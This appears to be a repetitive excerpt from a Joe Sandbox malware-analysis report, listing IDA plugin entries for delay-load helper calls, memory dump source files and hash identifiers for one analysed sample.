                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: 75b4fed2e48bee113457d49ec170f7f5e9ef28583504378d1daff7044fe402da
                                                                                                                                    • Instruction ID: 0a1ce1d32086557acd7eed67ba5063f8ea987c1da0db4754358771d95a699cfd
                                                                                                                                    • Opcode Fuzzy Hash: 75b4fed2e48bee113457d49ec170f7f5e9ef28583504378d1daff7044fe402da
                                                                                                                                    • Instruction Fuzzy Hash: 5FB012D5279040BC3257E1465C03E77014DC5C9F10330C07EF82EC5480D8446C000533
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: d6d02967e6eb71a7413b09ca4afcd1964b17c8d5f9e985ecdc3db1179dc123ca
                                                                                                                                    • Instruction ID: c9e3931fb23212cd6a1a342254aaef2ba676c69c84a07d8ff50d01ef5d0b1f61
                                                                                                                                    • Opcode Fuzzy Hash: d6d02967e6eb71a7413b09ca4afcd1964b17c8d5f9e985ecdc3db1179dc123ca
                                                                                                                                    • Instruction Fuzzy Hash: 4BB012D526C000BC3217F1565C03E37014CC1CAF10330C07EFC2DC5480D844BC000532
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: 062c1b464e2810e93dcc89c964ef038c34426b42ac1ebb538df4e811aa902945
                                                                                                                                    • Instruction ID: 92591b497afb6c5565819e7c216c8c52771729846ff636931420a11e5fbee9a0
                                                                                                                                    • Opcode Fuzzy Hash: 062c1b464e2810e93dcc89c964ef038c34426b42ac1ebb538df4e811aa902945
                                                                                                                                    • Instruction Fuzzy Hash: F3B012E5269140BC3297E2465C03E37010DC1C9F10330C17EF82DC5480D844AC440533
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: c6c088ff32ede8907ba66ed28d8ecd3eca8588101a2a7481f1ad377efecd1da0
                                                                                                                                    • Instruction ID: 21b2a0da6d51687e14cb9c72cafa5c87fe3b7cc77a2496a1bef1ba32458981de
                                                                                                                                    • Opcode Fuzzy Hash: c6c088ff32ede8907ba66ed28d8ecd3eca8588101a2a7481f1ad377efecd1da0
                                                                                                                                    • Instruction Fuzzy Hash: 31B012D52A9040BC3257F1465C03E37010DC1CAF10330C07EFC2DC5480D844AC000533
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: ba13e72eb60c1296a50e24776d8fdf0c28ac2dbe2825e621d445672ebabc143d
                                                                                                                                    • Instruction ID: dca9b036d019c552d3473f171b235b1a8200589e6dc13a75fbb1e6e4b21cfc02
                                                                                                                                    • Opcode Fuzzy Hash: ba13e72eb60c1296a50e24776d8fdf0c28ac2dbe2825e621d445672ebabc143d
                                                                                                                                    • Instruction Fuzzy Hash: AEB012E526C000BC3217E1475D03E37018CC1C9F10330C07EF82DC5480DC457D010532
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037EAF9
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 3Ro
                                                                                                                                    • API String ID: 1269201914-1492261280
                                                                                                                                    • Opcode ID: cff87c8c806430b89156c30997438238dad289a942f3605998dee7144ee14c86
                                                                                                                                    • Instruction ID: d20517389d2483cf541ab1fa457bded80f95770ebb165bb7952ab63c46f24f42
                                                                                                                                    • Opcode Fuzzy Hash: cff87c8c806430b89156c30997438238dad289a942f3605998dee7144ee14c86
                                                                                                                                    • Instruction Fuzzy Hash: E8B012CB2EA052BC365762001D02D37021CD4C4F90330D06EF529C8481DC844C010433
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: PDu<7
                                                                                                                                    • API String ID: 1269201914-3110419215
                                                                                                                                    • Opcode ID: 18e9087f091198a78ace68aaab65cf666a6e6d0ee143b51f495a754a03e93059
                                                                                                                                    • Instruction ID: ad319b83592a46177ea284a561477528627fca81665ef4371567f9fe5464d716
                                                                                                                                    • Opcode Fuzzy Hash: 18e9087f091198a78ace68aaab65cf666a6e6d0ee143b51f495a754a03e93059
                                                                                                                                    • Instruction Fuzzy Hash: 10B012CA2681007C321721241D06E7B021CC0C6F20330D07EF439C4881A8454D040432
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: PDu<7
                                                                                                                                    • API String ID: 1269201914-3110419215
                                                                                                                                    • Opcode ID: 9b92a09197f11ad023a14b60e2c3e3042242b0e8900af7e10f4ecf42550c5806
                                                                                                                                    • Instruction ID: d8ae37180091c1e88ade8030b08fb163bd9af1908f9089842cdfa3db4bc4b49a
                                                                                                                                    • Opcode Fuzzy Hash: 9b92a09197f11ad023a14b60e2c3e3042242b0e8900af7e10f4ecf42550c5806
                                                                                                                                    • Instruction Fuzzy Hash: 71B012CA2681007C331761085D03E3B021CC0CBF20330D26EF42DC4480E8444C440532
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E580
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: Fjun7
                                                                                                                                    • API String ID: 1269201914-1894352427
                                                                                                                                    • Opcode ID: 21ecaaf338a3d945777b6fdaebc93a7d4ac84789cb097cc3508a5ea10628af69
                                                                                                                                    • Instruction ID: 7c0ecd5c2690befd2e96460f9c33edae51010224d88e13f1baf1f42e004a1fdf
                                                                                                                                    • Opcode Fuzzy Hash: 21ecaaf338a3d945777b6fdaebc93a7d4ac84789cb097cc3508a5ea10628af69
                                                                                                                                    • Instruction Fuzzy Hash: 4DB012C52681007C325761545C03E37012CC0CAF20338D26EF42CC9480E8444C401532
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E580
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: Fjun7
                                                                                                                                    • API String ID: 1269201914-1894352427
                                                                                                                                    • Opcode ID: 94e0cc7fedcfdc3599c0bc6ea0e966ccfd6e0146ececde5487bc168890dc14f9
                                                                                                                                    • Instruction ID: 170a4395ab6eded5c37d4085bcb10247242064b2b24bc4a1bd960c5860f675fc
                                                                                                                                    • Opcode Fuzzy Hash: 94e0cc7fedcfdc3599c0bc6ea0e966ccfd6e0146ececde5487bc168890dc14f9
                                                                                                                                    • Instruction Fuzzy Hash: 39B012C52680007C321761555D02E37012CC0CAF20338D26EF42CC9480EC444D011532
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E580
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: Fjun7
                                                                                                                                    • API String ID: 1269201914-1894352427
                                                                                                                                    • Opcode ID: 3e957baf5a1c476cabf278ab2bbd5fcd7c4fc4bea79d142b3cba2c9f5dd23d4f
                                                                                                                                    • Instruction ID: 8cfed1db0d98d802ff8ab5ed68b2ffa2c132a30abf874781ede686d4abd40645
                                                                                                                                    • Opcode Fuzzy Hash: 3e957baf5a1c476cabf278ab2bbd5fcd7c4fc4bea79d142b3cba2c9f5dd23d4f
                                                                                                                                    • Instruction Fuzzy Hash: 24B012C62680047D321761541C02E77011CD0C9F20335D06EF42CC9480E8484C001533
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: f087345575df9e603e553b687a375f6ce4b195921bb1fee865bef379d8794b38
                                                                                                                                    • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                                                                    • Opcode Fuzzy Hash: f087345575df9e603e553b687a375f6ce4b195921bb1fee865bef379d8794b38
                                                                                                                                    • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: 5c732db068bac5f594484c3dca86fc47f020107e08fe9b60d2b6ff98465a974c
                                                                                                                                    • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                                                                    • Opcode Fuzzy Hash: 5c732db068bac5f594484c3dca86fc47f020107e08fe9b60d2b6ff98465a974c
                                                                                                                                    • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
